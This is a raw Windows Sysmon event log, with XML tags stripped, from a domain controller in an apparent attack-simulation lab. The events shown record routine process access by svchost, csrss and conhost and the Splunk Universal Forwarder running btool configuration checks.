13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8EE6-6005-CF00-00000000A301}47844780C:\Windows\system32\cmd.exe{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.653{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.646{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.609{59A5CD1D-8EE6-6005-CE00-00000000A301}48684788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CE00-00000000A301}4868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 